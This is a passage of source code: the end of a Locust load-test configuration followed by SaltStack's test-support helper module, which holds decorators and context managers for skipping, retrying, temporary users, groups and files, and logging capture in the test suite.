{"role": "leaf", "name": "test-leaf-12"},
{"role": "leaf", "name": "test-leaf-13"},
{"role": "leaf", "name": "test-leaf-14"},
{"role": "leaf", "name": "test-leaf-15"},
{"role": "leaf", "name": "test-leaf-16"},
{"role": "leaf", "name": "test-leaf-17"},
{"role": "leaf", "name": "test-leaf-18"},
{"role": "leaf", "name": "test-leaf-19"},
{"role": "leaf", "name": "test-leaf-20"}
]
}}
]
class MyLocust(HttpLocust):
host = "http://192.168.63.173:20080"
min_wait = 250
max_wait = 500
stop_timeout = 15000
task_set = MyTaskSet
|
helpers.py
|
# -*- coding: utf-8 -*-
"""
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
from __future__ import absolute_import, print_function, unicode_literals
import base64
import errno
import fnmatch
import functools
import inspect
import logging
import os
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
from contextlib import contextmanager
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.pycrypto
import salt.utils.stringutils
import salt.utils.versions
from salt.ext import six
from salt.ext.six.moves import builtins, range
from saltfactories.utils.ports import get_unused_localhost_port
from saltfactories.utils.processes.bases import ProcessResult
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
"PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skipif(
PRE_PYTEST_SKIP_OR_NOT, reason=PRE_PYTEST_SKIP_REASON
)
def no_symlinks():
"""
Check if git is installed and has symlinks enabled in the configuration.
"""
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ""
try:
output = subprocess.Popen(
["git", "config", "--get", "core.symlinks"],
cwd=RUNTIME_VARS.TMP,
stdout=subprocess.PIPE,
).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == "true":
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
"""
    Mark a test case as a destructive test, for example one that adds or removes
    users from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__destructive_test__", True)
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
reason = "Destructive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def expensiveTest(caller):
"""
Mark a test case as an expensive test, for example, a test which can cost
    money (Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__expensive_test__", True)
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
reason = "Expensive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def slowTest(caller):
"""
Mark a test case as a slow test.
.. code-block:: python
class MyTestCase(TestCase):
@slowTest
def test_that_takes_much_time(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__slow_test__", True)
if os.environ.get("SLOW_TESTS", "False").lower() == "false":
reason = "Slow tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def flaky(caller=None, condition=True, attempts=4):
"""
    Mark a test as flaky. The test will be retried up to ``attempts`` times
    (4 by default), looking for a successful run. The first retry happens
    immediately; later retries back off for ``attempt ** 2`` seconds.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
flaky(caller=function, condition=condition, attempts=attempts),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
if attempt > 0:
# Run through setUp again
                    # We only run it after the first iteration (>0) because the regular
                    # test runner will have already run setUp the first time
setup = getattr(cls, "setUp", None)
if callable(setup):
setup()
return caller(cls)
except SkipTest as exc:
cls.skipTest(exc.args[0])
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
if isinstance(exc, SkipTest):
six.reraise(*exc_info)
if not isinstance(exc, AssertionError) and log.isEnabledFor(
logging.DEBUG
):
log.exception(exc, exc_info=exc_info)
if attempt >= attempts - 1:
# We won't try to run tearDown once the attempts are exhausted
# because the regular test runner will do that for us
six.reraise(*exc_info)
# Run through tearDown again
teardown = getattr(cls, "tearDown", None)
if callable(teardown):
teardown()
backoff_time = attempt ** 2
log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
"""
    Mark a test as requiring the test suite's SSH daemon to be running.
.. code-block:: python
class MyTestCase(TestCase):
            @requires_sshd_server
def test_create_user(self):
pass
"""
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
self.skipTest("SSH tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
cls.skipTest("SSH tests are disabled")
return caller(cls)
return wrap
class RedirectStdStreams(object):
"""
Temporarily redirect system output to file like objects.
    By default, both `stdout` and `stderr` are redirected to `os.devnull`,
    which simply mutes the output.
"""
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
# pylint: disable=resource-leakage
stdout = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
if stderr is None:
# pylint: disable=resource-leakage
stderr = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception: # pylint: disable=broad-except
pass
try:
self.__stderr.flush()
except Exception: # pylint: disable=broad-except
pass
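# Illustrative sketch (not part of the original module): capturing output with
# RedirectStdStreams instead of muting it. The StringIO objects below are an
# assumption; by default the class redirects to os.devnull.
#
#     import io
#
#     out, err = io.StringIO(), io.StringIO()
#     with RedirectStdStreams(stdout=out, stderr=err) as streams:
#         print("this goes to the StringIO buffer, not the console")
#         streams.flush()
#         captured = out.getvalue()  # read before exit; the streams are closed on exit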
class TstSuiteLoggingHandler(object):
"""
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TstSuiteLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
"""
def __init__(self, level=0, format="%(levelname)s:%(message)s"):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
class ForceImportErrorOn(object):
"""
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
"""
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(
self, name, globals_=None, locals_=None, fromlist=None, level=None
):
if six.PY2:
if globals_ is None:
globals_ = {}
if locals_ is None:
locals_ = {}
if level is None:
if six.PY2:
level = -1
else:
level = 0
if fromlist is None:
fromlist = []
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError("Forced ImportError raised for {0!r}".format(name))
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
"Forced ImportError raised for {0!r}".format(
"from {0} import {1}".format(name, ", ".join(fromlist))
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps(object):
"""
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
    want to trigger a side effect a given number of times, and afterwards call
    the original, un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
"""
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
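# Illustrative sketch (assumed usage, not from the original module): wiring
# MockWraps into the ``wraps`` keyword of a Mock so the first two calls raise
# and the third one hits the real function. ``compute`` is a hypothetical name.
#
#     from unittest.mock import Mock  # or the test suite's mock wrapper
#
#     def compute(x):
#         return x * 2
#
#     mocked = Mock(wraps=MockWraps(compute, 2, RuntimeError("boom")))
#     # mocked(3) -> raises RuntimeError on the 1st and 2nd call, returns 6 afterwards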
def requires_network(only_local_network=False):
"""
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(cls, *args, **kwargs):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest("No local network was detected")
return func(cls)
if os.environ.get("NO_INTERNET"):
cls.skipTest("Environment variable NO_INTERNET is set.")
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in (
"173.194.41.198",
"173.194.41.199",
"173.194.41.200",
"173.194.41.201",
"173.194.41.206",
"173.194.41.192",
"173.194.41.193",
"173.194.41.194",
"173.194.41.195",
"173.194.41.196",
"173.194.41.197",
):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest("No internet network connection was detected")
finally:
sock.close()
return func(cls, *args, **kwargs)
return wrapper
return decorator
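# Illustrative sketch (not part of the original module): typical usage of the
# ``requires_network`` decorator factory. The test class/method names are
# hypothetical.
#
#     class MyNetworkTestCase(TestCase):
#         @requires_network()
#         def test_download(self):
#             ...
#
#         @requires_network(only_local_network=True)
#         def test_local_bind(self):
#             ...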
def with_system_user(
username, on_existing="delete", delete=True, password=None, groups=None
):
"""
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
kwargs = {"timeout": 60, "groups": groups}
if salt.utils.platform.is_windows():
kwargs.update({"password": password})
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not salt.utils.platform.is_windows() and password is not None:
if salt.utils.platform.is_darwin():
hashed_password = password
else:
hashed_password = salt.utils.pycrypto.gen_hash(
crypt_salt="SALTsalt", password=password
)
hashed_password = "'{0}'".format(hashed_password)
add_pwd = cls.run_function(
"shadow.set_password", [username, hashed_password]
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
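# Illustrative sketch (not part of the original module): how a module test case
# might consume ``with_system_user``. The class name and user name below are
# hypothetical.
#
#     class UserModuleTest(ModuleCase):
#         @with_system_user("test-salt-user", on_existing="delete", delete=True)
#         def test_user_info(self, username):
#             self.assertTrue(self.run_function("user.info", [username]))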
def with_system_group(group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system group to be used within a test
    case. The system group is created using the ``group`` salt module.
    The decorated testcase function must accept 'group' as an argument.
    :param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system user and group to be used within a
    test case. The system user is created using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
delete_group = cls.run_function("group.delete", [group])
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
class WithTempfile(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
if "prefix" not in kwargs:
kwargs["prefix"] = "__salt.test."
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
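# Illustrative sketch (not part of the original module): the decorator passes the
# generated temporary file name as the first argument after ``self``. The test
# name and suffix are hypothetical.
#
#     class TempfileTest(TestCase):
#         @with_tempfile(suffix=".conf")
#         def test_writes_config(self, name):
#             with salt.utils.files.fopen(name, "w") as fh:
#                 fh.write("key: value")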
class WithTempdir(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
def requires_system_grains(func):
"""
Function decorator which loads and passes the system's grains to the test
case.
"""
@functools.wraps(func)
def decorator(*args, **kwargs):
if not hasattr(requires_system_grains, "__grains__"):
# Late import
from tests.support.sminion import build_minion_opts
opts = build_minion_opts(minion_id="runtests-internal-sminion")
requires_system_grains.__grains__ = salt.loader.grains(opts)
kwargs["grains"] = requires_system_grains.__grains__
return func(*args, **kwargs)
return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
"""
    Skip the test if grains don't match the values passed into **kwargs.
    If a kwarg value is a list, skip unless the grain matches at least one item in the list.
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
            if not any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() != str(value).lower():
if reason is None:
reason = "This test runs on {}={}, not {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
"""
Reverse of `runs_on`.
    Skip the test if any grain matches the values passed into **kwargs.
    If a kwarg value is a list, skip if the grain matches any item in the list.
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() == str(value).lower():
if reason is None:
reason = "This test does not run on {}={}, got {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
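# Illustrative sketch (not part of the original module): grain-based skipping.
# The kwarg names map to grain names; values are compared case-insensitively.
# The class names below are hypothetical.
#
#     @runs_on(kernel="Linux")
#     class LinuxOnlyTest(TestCase):
#         ...
#
#     @not_runs_on(os=["Windows", "Darwin"], reason="POSIX-only behaviour")
#     class PosixOnlyTest(TestCase):
#         ...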
def _check_required_sminion_attributes(sminion_attr, *required_items):
"""
:param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
:param required_items: The items that must be part of the designated sminion attribute for the decorated test
:return The packages that are not available
"""
# Late import
from tests.support.sminion import create_sminion
required_salt_items = set(required_items)
sminion = create_sminion(minion_id="runtests-internal-sminion")
available_items = list(getattr(sminion, sminion_attr))
not_available_items = set()
name = "__not_available_{items}s__".format(items=sminion_attr)
if not hasattr(sminion, name):
setattr(sminion, name, set())
cached_not_available_items = getattr(sminion, name)
for not_available_item in cached_not_available_items:
if not_available_item in required_salt_items:
not_available_items.add(not_available_item)
required_salt_items.remove(not_available_item)
for required_item_name in required_salt_items:
search_name = required_item_name
if "." not in search_name:
search_name += ".*"
if not fnmatch.filter(available_items, search_name):
not_available_items.add(required_item_name)
cached_not_available_items.add(required_item_name)
return not_available_items
def requires_salt_states(*names):
"""
Makes sure the passed salt state is available. Skips the test if not
.. versionadded:: 3000
"""
not_available = _check_required_sminion_attributes("states", *names)
if not_available:
return skip("Unavailable salt states: {}".format(*not_available))
return _id
def requires_salt_modules(*names):
"""
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
"""
not_available = _check_required_sminion_attributes("functions", *names)
if not_available:
return skip("Unavailable salt modules: {}".format(*not_available))
return _id
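# Illustrative sketch (not part of the original module): skipping tests when a
# salt module or state is not loadable on the current platform. The module,
# state and class names below are hypothetical examples.
#
#     @requires_salt_modules("cmd.run", "file.replace")
#     @requires_salt_states("pkg.installed")
#     class PkgStateTest(ModuleCase):
#         ...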
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop("check_all", False)
message = kwargs.pop("message", None)
if kwargs:
raise RuntimeError(
"The only supported keyword argument is 'check_all' and "
"'message'. Invalid keyword arguments: {0}".format(", ".join(kwargs.keys()))
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
"{0}The {1!r} binary was not found".format(
message and "{0}. ".format(message) or "", binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
"{0}None of the following binaries was found: {1}".format(
message and "{0}. ".format(message) or "", ", ".join(binaries)
)
)
return _id
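# Illustrative sketch (not part of the original module): by default the test is
# skipped only when *none* of the binaries is found; with ``check_all=True`` all
# of them must be present. Binary and test names are hypothetical.
#
#     @skip_if_binaries_missing("docker")
#     class DockerTest(ModuleCase):
#         ...
#
#     @skip_if_binaries_missing("git", "gpg", check_all=True, message="signed tags")
#     def test_signed_tag(self):
#         ...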
def skip_if_not_root(func):
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(func, "__skip_if_not_root__", True)
if not sys.platform.startswith("win"):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as root to run this test"
)
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != "SYSTEM":
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as an Administrator to run this test"
)
return func
def repeat(caller=None, condition=True, times=5):
"""
    Repeat a test a given number of times (``times``, five by default), stopping
    at the first failure.
.. code-block:: python
